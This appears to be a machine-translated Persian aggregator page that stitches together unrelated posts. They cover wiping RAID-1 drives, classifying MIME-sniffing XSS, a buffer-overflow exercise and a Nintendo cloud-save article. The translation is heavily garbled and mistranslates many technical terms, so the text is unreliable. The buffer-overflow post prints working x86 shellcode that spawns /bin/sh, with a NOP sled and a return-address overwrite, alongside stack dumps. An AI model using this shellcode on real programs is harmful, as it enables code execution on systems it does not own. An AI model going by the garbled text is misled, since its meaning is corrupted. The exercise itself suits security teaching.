نوشته‌شده در

RAID-1 و قالب بندی پایین (و یا فایل خراب شدن)، شانس بیشتری برای بازیابی اطلاعات؟

در RAID-1، نوشتن به آرایه همیشه معادل نوشتن به هر درایو به صورت جداگانه است.

اما اگر من آن ها را جدا کنم و آنها را به عنوان درایوهای جداگانه وصل کنم، آیا احتمال بیشتری برای بازیابی فایل ها دارم؟

در تئوری هر درایو ممکن است در طول زمان آسیب دیده باشد. یک بخش آسیب دیده که برای خواندن برای بازگشت بیش از حد طول می کشد یا بار دیگر بیشتر از حد معمول است، به یک بخش جدید کپی می شود و بخش قبلی به عنوان غیر قابل استفاده مشخص می شود. این بخش remapping می تواند بخش هایی که قبلا نوشته شده اند را بدون تغییر حتی پس از رونویسی تمام درایو را ترک کند. این خاص نیست، اما اتفاق می افتد. به طور طبیعی، با استفاده از دو درایو، احتمال وقوع این اتفاق دو برابر می شود.

یک یادداشت کوچک: اکثر دستگاه های RAID یک فراداده کوچک در ابتدای هر درایو ذخیره می کنند که شامل اطلاعات اساسی مانند UUID، شماره درایو، حالت درایو، سطح آرایه، و غیره این متادیته زمانی که شما به آرایه می نویسید لمس نمی شود. اگر به هر دلیلی، شما معتقدید که داده های قدیمی و غیر استفاده شده که در آن ناحیه ابرداده جای نگرفته اند (که بعید است به طور معمول در ابتدای چند صد بخش از هر درایو باشد)، سپس نوشتن در آرایه ممکن نیست کافی نیست چون آن را بازنویسی نمی کند. این بسیار بعید است هر چند، و فقط به خاطر کامل بودن در اینجا ذکر شده است.

من همیشه تصور می کردم که یک راننده اصلی از راه اندازی RAID-1 وجود دارد، و کنترل کننده به نحوی "هوشمند" و انجام برخی از ترفندهای بهینه سازی است که منجر به حفظ برخی از داده های حذف شده در یکی از درایو ها می شود.

RAID-1 شامل یک درایو "master" نیست. در آن سطح حمله، هر درایو یک کلون کامل از هر درایو دیگر است. کنترل کننده از هیچ "ترفندهای" استفاده نخواهد کرد که موجب حفظ اطلاعات در یکی از درایوها شود. به همین دلیل است که نوشتن یک آرایه RAID-1 با سرعت کمترین سرعت درایو محدود می شود، زیرا هیچ بهینه سازی در حال انجام نیست و نوشتن تنها زمانی شروع می شود که به هر درایو در آرایه ارسال می شود.

حالا، آیا اشتباه میکنم؟ باید RAID-1 و فرمت سطح پایین (یا تقسیم شده) آنها را به طور جداگانه غیرفعال کنید تا اطمینان حاصل شود که داده ها از بین رفته است.

نوشتن در آرایه RAID-1 کارکردی برابر با نوشتن دو بار به هر درایو شخصی است. هر چیزی که شما در آرایه نوشتید، به صورت همزمان تکثیر و ضبط خواهد شد. توجه داشته باشید، با این حال، یک فرمت سطح پایین ممکن است کافی نباشد، در صورتی که در واقع تمام داده ها را بازنویسی نکند. کافی بودن آن بستگی به نرم افزار دقیق و سیستم فایل مورد استفاده شما دارد. اما به جای قالب بندی، باید ATA Security Erase را استفاده کنید. این یک ویژگی سیستم عامل درایوهای مدرن است که حذف خودکار تمام اطلاعات از سطح پایین را دارد. این می تواند چند ساعت در درایو های قدیمی تر و یا چند ثانیه در درایو های جدید که از SED استفاده می کنند. ATA Security Erase ممکن است با RAID کار نکند اگر نرم افزار از آن پشتیبانی نکند، در این صورت شما بایستی آرایه را قطع کنید و دستور را به هر یک از درایو صادر کنید.

نوشته‌شده در

آیا XSS از طریق MIME یک XSS ذخیره شده یا بازتاب شده را خراب می کند؟

عنوان این همه را می گوید. من درک می کنم که چگونه از XSS با استفاده از MIME استخراج استفاده می کنم، اما سوال این است آیا شما این نوع XSS را ذخیره یا بازتاب می کنید؟

OWASP می گوید

حملات ذخیره شده آنهایی هستند که اسکریپت تزریق شده به طور دائم
  ذخیره شده در سرورهای هدف ..
  قربانی سپس اسکریپت خرابکارانه از سرور را هنگامی که اطلاعات ذخیره شده را درخواست می کند بازیابی می کند

در حالی که حملات منعکس معمولا نیاز به تعامل با کاربر دارد، مانند کلیک کردن روی یک لینک مخرب برای مثال.

این کمی در مورد نوعی XSS این مورد زیر خواهد بود. من می توانم فایل من را تغییر دهم تا جاوا اسکریپت را در ابتدا داشته باشم، مرورگر آن را به عنوان یک فایل JS تفسیر کرده و اجرا کند. آیا این یک XSS ذخیره شده است؟

با تشکر از همه کمک!

نوشته‌شده در

چگونه می توان ترافیک VPN را با Snort خراب کرد؟

این سایت از کوکی ها برای ارائه خدمات ما و نمایش آگهی های مرتبط و لیست های شغلی استفاده می کند.
با استفاده از سایت ما، شما تأیید میکنید که ما خط مشی کوکیها، خط مشی رازداری و شرایط خدمات ما را خوانده و درک کردهاید.
استفاده شما از محصولات و خدمات سرریز پشته، از جمله شبکه سرریز پشته، تحت این شرایط و ضوابط است.
                

نوشته‌شده در

سرریز بافر – shellcode تزریقی پس از دستورالعمل ترک خراب شده است

من یک سرریز بافر برای یک کلاس تمرین می کنم و من یک تکه کد دارم که از یک سیستم منبع باز قرض گرفتم. متاسفانه من نمی توانم این کد را فاش کنم.

اطلاعات سیستم من: 

 nikel $ uname -a
لینوکس اوبونتو 4.15.0-29-عمومی # 31 ~ 16.04.1-اوبونتو SMP جمعه 18 ژوئیه 10:19:08 UTC 2018 i686 i686 i686 گنو / لینوکس

من از gdbgui برای اشکالزدایی که از طریق pip نصب کردم استفاده میکنم. این نسخه گرافیکی از gdb است. 

 nikel $ gdbgui --version
0.13.0.0

بافر من سرشار است، buf اعلام شده حاوی 128 بایت و در 0xbfffe928 وجود دارد. مقادیر به صورت زیر با آرایه اضافه می شوند: buf [len++]، جایی که len در 0xbfffe9a8 است. آدرس برگشت در 0xbfffe9bc .

این شل کد است که من تزریق می کنم: 

 " x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x31  xc0  x50  x68  x2f  x2f  x73  x68  x68  x2f  x62  x69  x6e  x89  xe3  x50  x89  xe2  x53  x89  xe1  xb0  x0b  xcd  x80  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x94  x28  xe9  xff  xbf "

در shellcode:

  1. هدف شلختگی، راه اندازی پوسته سیستم / bin / sh است. من آن را مستقیما از https://dhavalkapil.com/blogs/Shellcode-Injection/
  2. x94 کپی کردم که در انتهای آن قرار داده ام، چون آدرسهای حافظه را پر میکنم و به طور مستقیم نوشتن در آدرس بازگشت است که در 0xbfffe9bc .
  3. باز " لازم است که وارد عمل تضعیف شده و بسته شدن " لازم است از این تابع
  4. من فایل را با استفاده از vim -b ویرایش کرده ام و آن را به عنوان یک فایل .bin ذخیره کردم.

این حالت پشته درست قبل از ترک دستورالعمل: 

 0xbfffe928: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe930: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe938: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe940: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe948: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe950: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe958: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe960: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe968: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe970: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe978: 0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68
0xbfffe980: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50
0xbfffe988: 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd
0xbfffe990: 0x80 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe998: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a8: 0x99 0x00 0x00 0x00 0x22 0x00 0x00 0x00
0xbfffe9b0: 0xf0 0xef 0xff 0xbf 0x70 0xc1 0x05 0x08
0xbfffe9b8: 0xe8 0xe9 0xff 0xbf 0x28 0xe9 0xff 0xbf

این پشته پس از ترک دستورالعمل: 

 0xbfffe928: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe930: 0x90 0x90 0x90 0x90 0x00 0x00 0x00 0x00
0xbfffe938: 0x00 0x37 0xdb 0xb7 0x00 0x00 0x00 0x00
0xbfffe940: 0xa0 0xe5 0xe1 0xb7 0x00 0x00 0x00 0x00
0xbfffe948: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe950: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe958: 0xa9 0xf8 0xe1 0xb7 0x00 0x60 0xf6 0xb7
0xbfffe960: 0x00 0x60 0xf6 0xb7 0x00 0x60 0xf6 0xb7
0xbfffe968: 0x8c 0xe9 0xff 0xbf 0xd6 0xfc 0xe1 0xb7
0xbfffe970: 0x01 0x00 0x00 0x00 0x90 0x90 0x90 0x90
0xbfffe978: 0x6b 0x1e 0xe1 0xb7 0x70 0xc1 0x05 0x08
0xbfffe980: 0x00 0x60 0xf6 0xb7 0xc6 0xfc 0xe1 0xb7
0xbfffe988: 0x70 0xc1 0x05 0x08 0xaf 0xe9 0xff 0xbf
0xbfffe990: 0x00 0x00 0x00 0x00 0x90 0x90 0x90 0x90
0xbfffe998: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a8: 0x99 0x00 0x00 0x00 0x22 0x00 0x00 0xcc
0xbfffe9b0: 0xf0 0xef 0xff 0xbf 0x70 0xc1 0x05 0x08
0xbfffe9b8: 0xe8 0xe9 0xff 0xbf 0x28 0xe9 0xff 0xbf

من نمی فهمم که چرا فضای حافظه buf خراب شده است. اگر برنامه را اجرا کنم، این خطا را به من می دهد: 

 برنامه
 دریافت سیگنال SIGSEGV، گسل Segmentation.
0xbfffe928 در ؟؟ ()

EIP دارای مقدار 0xbfffe928 است که صحیح است. gdb می گوید نمی تواند به آدرس 0xbfffe928 دسترسی پیدا کند

نوشته‌شده در

برخی از بازی های نینتندو سوئیت همگام سازی ابر را پشتیبانی نمی کنند چرا که Cheaters همه چیز را خراب می کند – Geek Review

سرویس جدید سوئیچینگ Nintendo Switch در ماه جاری برنامه ریزی شده است، که موجب صرفه جویی در داده های ابر می شود. بعضی از بازی ها گنجانده نخواهند شد، زیرا نینتندو نمی خواهد خلبان را فعال کند.

پس از راه اندازی، سرویس 20 دلار در سال برای سوئیچ خود، کاربران را به بازی های خود در ابر ذخیره می کند و آنها را بین دستگاه ها همگام سازی می کند. با این حال، برخی از بازی ها از این پشتیبانی خارج خواهند شد. در بیانیه ای به CNET، نینتندو ادعا می کند که اکثریت بازی ها همگام سازی داده های ابر را پشتیبانی می کنند، اما تعداد کمی از آنها نمی توانند مانع دستکاری بازی های ناعادلانه شوند:

اکثر بازی های سوئیچ نینتندو پشتیبان ذخیره داده های ابر را پشتیبانی می کنند. با این حال، در بازی های خاص این قابلیت این امکان را برای مثال فراهم می آورد که مواردی را که برای دیگر بازیکنان به فروش رفته اند، بازیابی کنند یا به رتبه بندی چند نفره آنلاین که از دست رفته است، بازگردد. برای اطمینان از بازی عادلانه، پشتیبان ذخیره داده های ابر ممکن است برای چنین بازی هایی غیر فعال باشد.

برای اطمینان از اینکه پشتیبان گیری ذخیره داده های ابر نمی تواند به طور غیرمجاز بر رتبه بندی چند نفره آنلاین تاثیر بگذارد، این ویژگی در Splatoon 2 فعال نخواهد شد.

Sploton 2 تنها بازی نیست که تحت تاثیر قرار می گیرد. فهرست بازی برای چندین بازی Switch که حالت Save Data Cloud Backup موجود نیست، از جمله (اما نه محدود به) بازی های زیر:

  • Dark Souls: Remastered
  • FIFA 19
  • Pokemon: Let's Go Pikachu!
  • Pokemon: Let's Go Eevee
  • Splatoon 2

اکثر این بازی ها دارای یک عنصر پیشرفت یا رتبه بندی چند نفره آنلاین هستند که می تواند تحت تاثیر قرار گیرد که کاربران بتوانند به بازی قبلی بازی بازگردند. ذخیره سریع قبل از مبارزه بزرگ و بارگذاری مجدد پس از اینکه چهره خود را به شما دادید، یک ترفند رایج و کاربردی در بازی های تک نفره است که خوب است. این مسئله زمانی شروع می شود که شما با دیگران رقابت کنید.

به گفته ی این نکته، نینتندو می گوید که صرفه جویی در مسدود کردن ابر برای جلوگیری از تقلب ضروری است. در سیستم عامل های دیگر، چیزهایی مانند مجموعه موارد و رتبه بندی چند نفره در سمت سرور پردازش می شود، نه به صورت محلی بر روی یک دستگاه کاربر ذخیره می شود. ممکن است که نینتندو سیستم پیچیده ای را برای بررسی پیشرفت های کاربر یا موارد دیگر به عنوان سیستم عامل های دیگر نداشته باشد – این واقعیت که شرکت در سال 2018 صرفه جویی می کند، به اعتبار این نظریه اعتبار می بخشد حس می کند که نینتندو Cloud را برای بازی های خاص در این سیستم ذخیره می کند. با این حال، اگر نینتندو در حال پیشرفت در سناریوی مدرنتر باشد، بسیار خوب خواهد بود.

منبع: CNET